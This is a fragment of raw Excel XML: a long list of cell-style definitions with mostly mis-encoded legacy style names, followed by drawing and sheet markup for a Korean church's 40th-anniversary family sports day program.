    <cellStyle name="ÄÞ¸¶_ÃÖÁ¾ÀÏÁ¤ " xfId="444"/>
    <cellStyle name="AÞ¸¶_CASE21 " xfId="445"/>
    <cellStyle name="ÄÞ¸¶_Çö´ë¾÷¹«ÃßÁø " xfId="446"/>
    <cellStyle name="AÞ¸¶_CuA¶Au_96°eE¹ " xfId="447"/>
    <cellStyle name="ÄÞ¸¶_ÇùÁ¶Àü_96°èÈ¹ " xfId="448"/>
    <cellStyle name="AÞ¸¶_DW °¡¸¶°¨ " xfId="449"/>
    <cellStyle name="ÄÞ¸¶_INQUIRY ¿µ¾÷ÃßÁø " xfId="450"/>
    <cellStyle name="AÞ¸¶_INQUIRY ¿μ¾÷AßAø " xfId="451"/>
    <cellStyle name="ÄÞ¸¶_lx-taxi " xfId="452"/>
    <cellStyle name="AÞ¸¶_lx-taxi _±¸¸A½CAu " xfId="453"/>
    <cellStyle name="ÄÞ¸¶_MKN-M1.1 " xfId="454"/>
    <cellStyle name="AÞ¸¶_SAMPLE " xfId="455"/>
    <cellStyle name="ÄÞ¸¶_SAMPLE " xfId="456"/>
    <cellStyle name="AÞ¸¶_Sheet1 (2)_1.SUMMARY " xfId="457"/>
    <cellStyle name="ÄÞ¸¶_Sheet1 (2)_1.SUMMARY " xfId="458"/>
    <cellStyle name="AÞ¸¶_Sheet1 (2)_3.MSCHEDULE¿μ¹R " xfId="459"/>
    <cellStyle name="ÄÞ¸¶_Sheet1_1.SUMMARY " xfId="460"/>
    <cellStyle name="AÞ¸¶_Sheet1_3.MSCHEDULE¿μ¹R " xfId="461"/>
    <cellStyle name="ÄÞ¸¶_Sheet1_ÃÖÁ¾ÀÏÁ¤ " xfId="462"/>
    <cellStyle name="AÞ¸¶_Sheet1_XD AOA¾AIA¤ " xfId="463"/>
    <cellStyle name="ÄÞ¸¶_Sheet1_XD ÃÖÁ¾ÀÏÁ¤ " xfId="464"/>
    <cellStyle name="AÞ¸¶_SMG-CKD-d1.1 " xfId="465"/>
    <cellStyle name="ÄÞ¸¶_SMG-CKD-d1.1 " xfId="466"/>
    <cellStyle name="AÞ¸¶_XG¿ø´UA§ " xfId="467"/>
    <cellStyle name="ÄÞ¸¶_XG¿ø´ÜÀ§ " xfId="468"/>
    <cellStyle name="AÞ¸¶_μðAⓒAIA¤ " xfId="469"/>
    <cellStyle name="Body" xfId="470"/>
    <cellStyle name="Box" xfId="471"/>
    <cellStyle name="C_TITLE" xfId="472"/>
    <cellStyle name="C¡ERIA￠R¡×¡§¡I_¡ER¡§￠R¡§I¡ERAi¡ERicAc¡ER¡§￠Ri " xfId="473"/>
    <cellStyle name="C¡IA¨ª_ ¨¡?¨¡CAⓒ­¨￢¡Æ " xfId="474"/>
    <cellStyle name="C¡ÍA¨ª_(A¢´¨¬¢¬¨¬I©öR)¢¯u¨¬¡ÆAI¢¯©ª¡ÆeE©ö" xfId="475"/>
    <cellStyle name="C¡IA¨ª_¡Æ￠R¨uO￠￢¡ÆAIA￠´_￥iⓒ￡A¨IAIA￠´ " xfId="476"/>
    <cellStyle name="C¡ÍA¨ª_C¡¿¢¬n¢¯u¨¬n¢¯e " xfId="477"/>
    <cellStyle name="C¡IA¨ª_M105CDT " xfId="478"/>
    <cellStyle name="C¡ÍA¨ª_M105CDT " xfId="479"/>
    <cellStyle name="C¡IA¨ª_M107CDT " xfId="480"/>
    <cellStyle name="C¡ÍA¨ª_M107CDT " xfId="481"/>
    <cellStyle name="C￠RIA¡§¨￡_¡§uc¡§oA " xfId="482"/>
    <cellStyle name="C￥AØ_ 10AE " xfId="483"/>
    <cellStyle name="Ç¥ÁØ_¡ßFO ÅõÀÚºñºñ±³ " xfId="484"/>
    <cellStyle name="C￥AØ_´U°eº° ±¸Aa¾E" xfId="485"/>
    <cellStyle name="Ç¥ÁØ_´Ü°èº° ±¸Ãà¾È" xfId="486"/>
    <cellStyle name="C￥AØ_¸i´U" xfId="487"/>
    <cellStyle name="Ç¥ÁØ_¸ñÂ÷ " xfId="488"/>
    <cellStyle name="C￥AØ_¸nA÷ _±¸¸A½CAu " xfId="489"/>
    <cellStyle name="Ç¥ÁØ_¿µ¾÷ÇöÈ² " xfId="490"/>
    <cellStyle name="C￥AØ_¿i¿μ¾E " xfId="491"/>
    <cellStyle name="Ç¥ÁØ_¿ø´ÜÀ§ " xfId="492"/>
    <cellStyle name="C￥AØ_¿ø°¡(AU·a¼oAy) " xfId="493"/>
    <cellStyle name="Ç¥ÁØ_±â¾È " xfId="494"/>
    <cellStyle name="C￥AØ_±aAØ " xfId="495"/>
    <cellStyle name="Ç¥ÁØ_±âÁØ " xfId="496"/>
    <cellStyle name="C￥AØ_≫c¾÷°³¹ßÆA_10¿u2WA¸ºI " xfId="497"/>
    <cellStyle name="Ç¥ÁØ_°¡¼Ö¸°ÀÏÁ¤_µðÁ©ÀÏÁ¤ " xfId="498"/>
    <cellStyle name="C￥AØ_°¡¼O¸°AIA¤_μðAⓒAIA¤ " xfId="499"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤ " xfId="500"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ " xfId="501"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ " xfId="502"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _02가동율 계획(1)" xfId="503"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _02가동율 계획(1)" xfId="504"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _03생산합격율 계획" xfId="505"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _03생산합격율 계획" xfId="506"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _4월 차종별_총투입공수(수정계획)- 2002.05.31" xfId="507"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _4월 차종별_총투입공수(수정계획)- 2002.05.31" xfId="508"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _가동,합격율 BD(02년 실적및 03년 계획-1204)" xfId="509"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _가동,합격율 BD(02년 실적및 03년 계획-1204)" xfId="510"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _하반기 추진테마별 활동계획(샘플 생산)- 2004.09.03" xfId="511"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _하반기 추진테마별 활동계획(샘플 생산)- 2004.09.03" xfId="512"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _하반기 추진테마별 활동계획(의장1부)- 2004.09.06(최종)" xfId="513"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _하반기 추진테마별 활동계획(의장1부)- 2004.09.06(최종)" xfId="514"/>
    <cellStyle name="C￥AØ_°³¹ßAIA¤  (2)_°³¹ßAIA¤ _Book1" xfId="515"/>
    <cellStyle name="Ç¥ÁØ_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ _Book1" xfId="516"/>
    <cellStyle name="C￥AØ_°æAi≫cAc°i " xfId="517"/>
    <cellStyle name="Ç¥ÁØ_0N-HANDLING " xfId="518"/>
    <cellStyle name="C￥AØ_¼oAOCaA¤½A≫o " xfId="519"/>
    <cellStyle name="Ç¥ÁØ_½ÇÂ÷Á¶°Ç " xfId="520"/>
    <cellStyle name="C￥AØ_½CA÷A¶°C _±¸¸A½CAu " xfId="521"/>
    <cellStyle name="Ç¥ÁØ_1.ÆÇ¸Å½ÇÀû " xfId="522"/>
    <cellStyle name="C￥AØ_1.SUMMARY " xfId="523"/>
    <cellStyle name="Ç¥ÁØ_1.SUMMARY " xfId="524"/>
    <cellStyle name="C￥AØ_10+10 " xfId="525"/>
    <cellStyle name="Ç¥ÁØ_1Â÷ ¼³°è¿ø°¡ºÐ¼®_KDº¯µ¿ " xfId="526"/>
    <cellStyle name="C￥AØ_1A÷ ¼³°e¿ø°¡ºÐ¼R_KDº?μ¿ " xfId="527"/>
    <cellStyle name="Ç¥ÁØ_2.0GLS_¿ø´ÜÀ§ " xfId="528"/>
    <cellStyle name="C￥AØ_2.5GLS_¿ø´UA§ " xfId="529"/>
    <cellStyle name="Ç¥ÁØ_2.5GLS_¿ø´ÜÀ§ " xfId="530"/>
    <cellStyle name="C￥AØ_2.CONCEPT " xfId="531"/>
    <cellStyle name="Ç¥ÁØ_2.CONCEPT " xfId="532"/>
    <cellStyle name="C￥AØ_2¿uA¶¸³ " xfId="533"/>
    <cellStyle name="Ç¥ÁØ_3PJTR°èÈ¹ " xfId="534"/>
    <cellStyle name="C￥AØ_4 " xfId="535"/>
    <cellStyle name="Ç¥ÁØ_4 " xfId="536"/>
    <cellStyle name="C￥AØ_5-1±¤°i " xfId="537"/>
    <cellStyle name="Ç¥ÁØ_5-1±¤°í " xfId="538"/>
    <cellStyle name="C￥AØ_5-3-3-1-1.≫y≫e±¸A¶ºÐ¼R-MAT'L¡­ " xfId="539"/>
    <cellStyle name="Ç¥ÁØ_5-4 INDIRECT EP" xfId="540"/>
    <cellStyle name="C￥AØ_6-3°æAi·A " xfId="541"/>
    <cellStyle name="Ç¥ÁØ_6-3°æÀï·Â " xfId="542"/>
    <cellStyle name="C￥AØ_6-3°æAi·A _±¸¸A½CAu " xfId="543"/>
    <cellStyle name="Ç¥ÁØ_7.MASTER SCHEDULE " xfId="544"/>
    <cellStyle name="C￥AØ_8HR " xfId="545"/>
    <cellStyle name="Ç¥ÁØ_96ÀÎ¿ø°è2 " xfId="546"/>
    <cellStyle name="C￥AØ_96AI¿ø°O 3 " xfId="547"/>
    <cellStyle name="Ç¥ÁØ_96ÀÎ¿ø°Ô 3 " xfId="548"/>
    <cellStyle name="C￥AØ_A≪¸Þ¶o " xfId="549"/>
    <cellStyle name="Ç¥ÁØ_ÃµÈ£3¿ù " xfId="550"/>
    <cellStyle name="C￥AØ_A¶A÷μμ(12.31) " xfId="551"/>
    <cellStyle name="Ç¥ÁØ_Ã·ºÎ2 " xfId="552"/>
    <cellStyle name="C￥AØ_A¾CO_8HR " xfId="553"/>
    <cellStyle name="Ç¥ÁØ_Æ¯±â3_p.mix " xfId="554"/>
    <cellStyle name="C￥AØ_AI¿ø¹× A¶A÷(96.5.2.) _±¸¸A½CAu " xfId="555"/>
    <cellStyle name="Ç¥ÁØ_ÀÏ¹Ý»çÇ×check list " xfId="556"/>
    <cellStyle name="C￥AØ_AO¿aITEMA÷AIºn±³-2_AuEA A÷AIºn±³ " xfId="557"/>
    <cellStyle name="Ç¥ÁØ_ÁÖ¿äITEMÂ÷ÀÌºñ±³-2_ÀüÈÄ Â÷ÀÌºñ±³ " xfId="558"/>
    <cellStyle name="C￥AØ_Ao¿øCoE² " xfId="559"/>
    <cellStyle name="Ç¥ÁØ_ÃÖÁ¾ÀÏÁ¤ " xfId="560"/>
    <cellStyle name="C￥AØ_AoAUºn(ºI¼­º°,°eA¤º°) " xfId="561"/>
    <cellStyle name="Ç¥ÁØ_ÅõÀÚºñ(ºÎ¼­º°,°èÁ¤º°) " xfId="562"/>
    <cellStyle name="C￥AØ_Aß±a≫y≫e°eE¹ " xfId="563"/>
    <cellStyle name="Ç¥ÁØ_ÃßÁ¤´ëÂ÷ " xfId="564"/>
    <cellStyle name="C￥AØ_AuEAITEMA÷AIºn±³-1 " xfId="565"/>
    <cellStyle name="Ç¥ÁØ_ÀüÈÄITEMÂ÷ÀÌºñ±³-1 " xfId="566"/>
    <cellStyle name="C￥AØ_AuEAITEMA÷AIºn±³-2 " xfId="567"/>
    <cellStyle name="Ç¥ÁØ_ÀüÈÄITEMÂ÷ÀÌºñ±³-2 " xfId="568"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) " xfId="569"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) " xfId="570"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _02가동율 계획(1)" xfId="571"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _02가동율 계획(1)" xfId="572"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _'02년1~12월 HPV예상실적(KPI미반영-1203)" xfId="573"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _'02년1~12월 HPV예상실적(KPI미반영-1203)" xfId="574"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _03~05차종별목표및 총공수- 2002.11.22" xfId="575"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _03~05차종별목표및 총공수- 2002.11.22" xfId="576"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _03년 차종별 목표및 총공수- 2002.12.27" xfId="577"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _03년 차종별 목표및 총공수- 2002.12.27" xfId="578"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _04년 감사자료 bd(2공장 종합현황,0128)" xfId="579"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _04년 감사자료 bd(2공장 종합현황,0128)" xfId="580"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _1월 예상실적" xfId="581"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _1월 예상실적" xfId="582"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _3차 수정 사업계획(부서통보용-0108)" xfId="583"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _3차 수정 사업계획(부서통보용-0108)" xfId="584"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _4월 차종별_총투입공수(수정계획)- 2002.05.31" xfId="585"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _4월 차종별_총투입공수(수정계획)- 2002.05.31" xfId="586"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _부서별 감사팀 제출자료(0427)" xfId="587"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _부서별 감사팀 제출자료(0427)" xfId="588"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _b-data표지" xfId="589"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _b-data표지" xfId="590"/>
    <cellStyle name="C￥AØ_Ay°eC￥(2¿u) _Book4" xfId="591"/>
    <cellStyle name="Ç¥ÁØ_Áý°èÇ¥(2¿ù) _Book4" xfId="592"/>
    <cellStyle name="C￥AØ_C￥1_¿ø´UA§ " xfId="593"/>
    <cellStyle name="Ç¥ÁØ_Ç¥1_¿ø´ÜÀ§ " xfId="594"/>
    <cellStyle name="C￥AØ_C￥2_¿ø´UA§ " xfId="595"/>
    <cellStyle name="Ç¥ÁØ_Ç¥2_¿ø´ÜÀ§ " xfId="596"/>
    <cellStyle name="C￥AØ_C￥3_¿ø´UA§ " xfId="597"/>
    <cellStyle name="Ç¥ÁØ_Ç¥3_¿ø´ÜÀ§ " xfId="598"/>
    <cellStyle name="C￥AØ_C￥4_¿ø´UA§ " xfId="599"/>
    <cellStyle name="Ç¥ÁØ_Ç¥4_¿ø´ÜÀ§ " xfId="600"/>
    <cellStyle name="C￥AØ_C￥Ao " xfId="601"/>
    <cellStyle name="Ç¥ÁØ_Çö´ë¾÷¹«ÃßÁø " xfId="602"/>
    <cellStyle name="C￥AØ_CoAo¹yAI °A¾×¿ⓒ½A " xfId="603"/>
    <cellStyle name="Ç¥ÁØ_CON¿ø´Ü.XLS " xfId="604"/>
    <cellStyle name="C￥AØ_CuA¶Au_1_10¿u2WA¸ºI " xfId="605"/>
    <cellStyle name="Ç¥ÁØ_ÇùÁ¶Àü_96°èÈ¹ " xfId="606"/>
    <cellStyle name="C￥AØ_CuA¶Au_AoAO°eE¹ " xfId="607"/>
    <cellStyle name="Ç¥ÁØ_ÇùÁ¶Àü_ÅõÀÔ°èÈ¹ " xfId="608"/>
    <cellStyle name="C￥AØ_F006-1A÷ " xfId="609"/>
    <cellStyle name="Ç¥ÁØ_H1 ´ë XG ¿ø´ÜÀ§ " xfId="610"/>
    <cellStyle name="C￥AØ_H1VSXGAßA¤¿ø´UA§_¿ø´UA§ " xfId="611"/>
    <cellStyle name="Ç¥ÁØ_H1VSXGÃßÁ¤¿ø´ÜÀ§_¿ø´ÜÀ§ " xfId="612"/>
    <cellStyle name="C￥AØ_KD LIST_¿ø´UA§ " xfId="613"/>
    <cellStyle name="Ç¥ÁØ_KD LIST_¿ø´ÜÀ§ " xfId="614"/>
    <cellStyle name="C￥AØ_KD LIST_AuEA A÷AIºn±³ " xfId="615"/>
    <cellStyle name="Ç¥ÁØ_KD LIST_ÀüÈÄ Â÷ÀÌºñ±³ " xfId="616"/>
    <cellStyle name="C￥AØ_KPI¾÷A¼ " xfId="617"/>
    <cellStyle name="Ç¥ÁØ_laroux_°³¹ßÀÏÁ¤ " xfId="618"/>
    <cellStyle name="C￥AØ_laroux_°³¹ßAIA¤  (2)_°³¹ßAIA¤ " xfId="619"/>
    <cellStyle name="Ç¥ÁØ_laroux_°³¹ßÀÏÁ¤  (2)_°³¹ßÀÏÁ¤ " xfId="620"/>
    <cellStyle name="C￥AØ_laroux_1_°³¹ßAIA¤ " xfId="621"/>
    <cellStyle name="Ç¥ÁØ_laroux_1_°³¹ßÀÏÁ¤ " xfId="622"/>
    <cellStyle name="C￥AØ_laroux_2_°³¹ßAIA¤ " xfId="623"/>
    <cellStyle name="Ç¥ÁØ_laroux_2_°³¹ßÀÏÁ¤ " xfId="624"/>
    <cellStyle name="C￥AØ_LX A÷AIºn±³_AuEA A÷AIºn±³ " xfId="625"/>
    <cellStyle name="Ç¥ÁØ_LX Â÷ÀÌºñ±³_ÀüÈÄ Â÷ÀÌºñ±³ " xfId="626"/>
    <cellStyle name="C￥AØ_LXLZ3.0 " xfId="627"/>
    <cellStyle name="Ç¥ÁØ_LXLZ3.0 " xfId="628"/>
    <cellStyle name="C￥AØ_LXLZ3.5 " xfId="629"/>
    <cellStyle name="Ç¥ÁØ_LXLZ3.5 " xfId="630"/>
    <cellStyle name="C￥AØ_LXLZ4.5 " xfId="631"/>
    <cellStyle name="Ç¥ÁØ_LXLZ4.5 " xfId="632"/>
    <cellStyle name="C￥AØ_LXLZEXH_AuEA A÷AIºn±³ " xfId="633"/>
    <cellStyle name="Ç¥ÁØ_LXLZEXH_ÀüÈÄ Â÷ÀÌºñ±³ " xfId="634"/>
    <cellStyle name="C￥AØ_lx-taxi " xfId="635"/>
    <cellStyle name="Ç¥ÁØ_lx-taxi " xfId="636"/>
    <cellStyle name="C￥AØ_lx-taxi _±¸¸A½CAu " xfId="637"/>
    <cellStyle name="Ç¥ÁØ_LZ3.5´ë4.5_ÀüÈÄ Â÷ÀÌºñ±³ " xfId="638"/>
    <cellStyle name="C￥AØ_M105CDT " xfId="639"/>
    <cellStyle name="Ç¥ÁØ_MHPORTER " xfId="640"/>
    <cellStyle name="C￥AØ_MKN-M1.1 " xfId="641"/>
    <cellStyle name="Ç¥ÁØ_MKN-M1.1 " xfId="642"/>
    <cellStyle name="C￥AØ_º¸°i_KDº?μ¿ " xfId="643"/>
    <cellStyle name="Ç¥ÁØ_º¸°í_KDº¯µ¿ " xfId="644"/>
    <cellStyle name="C￥AØ_º≫ºIA¶A÷ " xfId="645"/>
    <cellStyle name="Ç¥ÁØ_ºñ±³    " xfId="646"/>
    <cellStyle name="C￥AØ_ORDER (I)_PRINT_0404_10¿u2WA¸ºI " xfId="647"/>
    <cellStyle name="Ç¥ÁØ_RDTR99ML " xfId="648"/>
    <cellStyle name="C￥AØ_RR1¾E " xfId="649"/>
    <cellStyle name="Ç¥ÁØ_Sheet1 (2)_1.SUMMARY " xfId="650"/>
    <cellStyle name="C￥AØ_Sheet1 (2)_3.MSCHEDULE¿μ¹R " xfId="651"/>
    <cellStyle name="Ç¥ÁØ_Sheet1(2)_¿ø´ÜÀ§ " xfId="652"/>
    <cellStyle name="C￥AØ_Sheet1_¿ø´UA§ " xfId="653"/>
    <cellStyle name="Ç¥ÁØ_Sheet1_¿ø´ÜÀ§ " xfId="654"/>
    <cellStyle name="C￥AØ_Sheet1_1_1.SUMMARY " xfId="655"/>
    <cellStyle name="Ç¥ÁØ_Sheet1_1_1.SUMMARY " xfId="656"/>
    <cellStyle name="C￥AØ_Sheet1_1_3.MSCHEDULE¿μ¹R " xfId="657"/>
    <cellStyle name="Ç¥ÁØ_Sheet1_1_XD ÃÖÁ¾ÀÏÁ¤ " xfId="658"/>
    <cellStyle name="C￥AØ_Sheet1_3.MSCHEDULE¿μ¹R " xfId="659"/>
    <cellStyle name="Ç¥ÁØ_Sheet1_BRK¿ø´Ü.XLS " xfId="660"/>
    <cellStyle name="C￥AØ_Sheet1_CON¿ø´U.XLS " xfId="661"/>
    <cellStyle name="Ç¥ÁØ_Sheet1_CON¿ø´Ü.XLS " xfId="662"/>
    <cellStyle name="C￥AØ_SMG-CKD-d1.1 " xfId="663"/>
    <cellStyle name="Ç¥ÁØ_SMG-CKD-d1.1 " xfId="664"/>
    <cellStyle name="C￥AØ_V10 VARIATION MODEL SOP TIMING " xfId="665"/>
    <cellStyle name="Ç¥ÁØ_WIPER " xfId="666"/>
    <cellStyle name="C￥AØ_WIRING _±¸¸A½CAu " xfId="667"/>
    <cellStyle name="Ç¥ÁØ_XD ÃÖÁ¾ÀÏÁ¤ " xfId="668"/>
    <cellStyle name="C￥AØ_XG¿ø´UA§ " xfId="669"/>
    <cellStyle name="Ç¥ÁØ_XG¿ø´ÜÀ§ " xfId="670"/>
    <cellStyle name="C￥AØ_XG¿ø´UA§(2A÷°e≫e) " xfId="671"/>
    <cellStyle name="Ç¥ÁØ_XG3Â÷°è»ê¿ø´ÜÀ§ " xfId="672"/>
    <cellStyle name="C￥AØ_XG3A÷°e≫e¿ø´UA§ " xfId="673"/>
    <cellStyle name="category" xfId="674"/>
    <cellStyle name="CIA SPA II LAY-OUT" xfId="675"/>
    <cellStyle name="CIAI¨¡U¢¬¥ìA¨Ï" xfId="676"/>
    <cellStyle name="Comma  - Style1" xfId="677"/>
    <cellStyle name="Comma [0]" xfId="678"/>
    <cellStyle name="comma zerodec" xfId="679"/>
    <cellStyle name="Comma_ SG&amp;A Bridge " xfId="680"/>
    <cellStyle name="Cost" xfId="681"/>
    <cellStyle name="Curren - Style2" xfId="682"/>
    <cellStyle name="Currency [0]" xfId="683"/>
    <cellStyle name="Currency_ SG&amp;A Bridge " xfId="684"/>
    <cellStyle name="Currency1" xfId="685"/>
    <cellStyle name="cy_mud plant bolted_KMN LAY-OUT" xfId="686"/>
    <cellStyle name="Date" xfId="687"/>
    <cellStyle name="Dezimal [0]_hitliste März 98" xfId="688"/>
    <cellStyle name="Dezimal_hitliste März 98" xfId="689"/>
    <cellStyle name="Dollar (zero dec)" xfId="690"/>
    <cellStyle name="Dziesiętny [0]_Daily Report - April'2001" xfId="691"/>
    <cellStyle name="Dziesiętny_Daily Report - April'2001" xfId="692"/>
    <cellStyle name="ᲲéᴲéᶲéḲéẲéἲéᾲé′é₲éℲé↲é" xfId="693"/>
    <cellStyle name="ency_MATERAL2_laroux" xfId="694"/>
    <cellStyle name="Euro" xfId="695"/>
    <cellStyle name="EY [0.00]_PRODUCT DETAIL Q1" xfId="696"/>
    <cellStyle name="ÊÝ [0.00]_PRODUCT DETAIL Q1" xfId="697"/>
    <cellStyle name="EY_PRODUCT DETAIL Q1" xfId="698"/>
    <cellStyle name="ÊÝ_PRODUCT DETAIL Q1" xfId="699"/>
    <cellStyle name="Fixed" xfId="700"/>
    <cellStyle name="Grey" xfId="701"/>
    <cellStyle name="HEADER" xfId="702"/>
    <cellStyle name="Header1" xfId="703"/>
    <cellStyle name="Header2" xfId="704"/>
    <cellStyle name="Heading1" xfId="705"/>
    <cellStyle name="Heading2" xfId="706"/>
    <cellStyle name="Input [yellow]" xfId="707"/>
    <cellStyle name="Item_Current" xfId="708"/>
    <cellStyle name="LAY-OUT" xfId="709"/>
    <cellStyle name="Model" xfId="710"/>
    <cellStyle name="N LAY-OUT" xfId="711"/>
    <cellStyle name="no dec" xfId="712"/>
    <cellStyle name="Normal - Style1" xfId="713"/>
    <cellStyle name="Normal_ SG&amp;A Bridge" xfId="714"/>
    <cellStyle name="Normal1" xfId="715"/>
    <cellStyle name="Normal4" xfId="716"/>
    <cellStyle name="Normal忈OTD thru NOR " xfId="717"/>
    <cellStyle name="Normalny_Daily Report - April'2001" xfId="718"/>
    <cellStyle name="nt bolted_BOOK1" xfId="719"/>
    <cellStyle name="NUM_" xfId="720"/>
    <cellStyle name="Number" xfId="721"/>
    <cellStyle name="o??귟 [0.00]_PRODUCT DETAIL Q1" xfId="722"/>
    <cellStyle name="Percent [2]" xfId="723"/>
    <cellStyle name="Percent_GTHMSNZ" xfId="724"/>
    <cellStyle name="R_TITLE" xfId="725"/>
    <cellStyle name="rrency_mud plant bolted_CIA SPA II LAY-OUT" xfId="726"/>
    <cellStyle name="RSONAL" xfId="727"/>
    <cellStyle name="Standard_Daily 01.09.98.xls Diagramm 1" xfId="728"/>
    <cellStyle name="subhead" xfId="729"/>
    <cellStyle name="þ_x001D_ð'&amp;Oy?Hy9_x0008__x000F__x0007_æ_x0007__x0007__x0001__x0001_" xfId="730"/>
    <cellStyle name="Total" xfId="731"/>
    <cellStyle name="UR" xfId="732"/>
    <cellStyle name="_x001C_urrency_laroux_BOOK1" xfId="733"/>
    <cellStyle name="Vehicle_Benchmark" xfId="734"/>
    <cellStyle name="Version_Header" xfId="735"/>
    <cellStyle name="W?_BOOKSHIP" xfId="736"/>
    <cellStyle name="W_BOOKSHIP" xfId="737"/>
    <cellStyle name="Währung [0]_hitliste März 98" xfId="738"/>
    <cellStyle name="Währung_hitliste März 98" xfId="739"/>
    <cellStyle name="Walutowy [0]_Daily Report - April'2001" xfId="740"/>
    <cellStyle name="Walutowy_Daily Report - April'2001" xfId="741"/>
    <cellStyle name="Обычный_База по кодам" xfId="742"/>
    <cellStyle name="ન࿿ઇ૆૞૩૴ાઝુ૥઻ઢઓહ઩ૣોિૐ૭ઊૅ૶૮૯ઁમભ૵૎࿿૬૒_VBA_PROJECT_CUR" xfId="7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1</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>1447800</xdr:colOff>
      <xdr:row>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1485900" y="161925"/>
          <a:ext cx="39624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전교인 체육대회 프로그램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4</xdr:col>
      <xdr:colOff>1924050</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>533400</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="1" name="Rectangle 1"/>
        <xdr:cNvSpPr>
          <a:spLocks/>
        </xdr:cNvSpPr>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1038225" y="142875"/>
          <a:ext cx="488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전교인 가족 운동회 프로그램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4</xdr:col>
      <xdr:colOff>2438400</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>533400</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="1" name="Rectangle 1"/>
        <xdr:cNvSpPr>
          <a:spLocks/>
        </xdr:cNvSpPr>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="257175" y="142875"/>
          <a:ext cx="60579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명성교회 설립 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" cap="none" sz="2400" b="1" i="0" u="none" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>40</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" cap="none" sz="2400" b="1" i="0" u="none" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>주년 기념 가족 운동회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C33" sqref="C33:E33"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="4.10546875" style="8" customWidth="1"/>
    <col min="2" max="2" width="13.4453125" style="8" customWidth="1"/>
    <col min="3" max="3" width="19.77734375" style="8" customWidth="1"/>
    <col min="4" max="4" width="9.3359375" style="8" customWidth="1"/>
    <col min="5" max="5" width="38.5546875" style="8" customWidth="1"/>
    <col min="6" max="16384" width="8.88671875" style="8" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="12">
      <c r="E1" s="16" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" ht="43.5" customHeight="1"/>
    <row r="3" ht="12.75" thickBot="1">
      <c r="E3" s="16" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="4" spans="1:5" s="9" customFormat="1" ht="36.75" customHeight="1" thickBot="1">
      <c r="A4" s="13" t="s">
        <v>0</v>
      </c>
      <c r="B4" s="14" t="s">
        <v>1</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>2</v>
      </c>
      <c r="D4" s="14" t="s">
        <v>3</v>
      </c>
      <c r="E4" s="15" t="s">
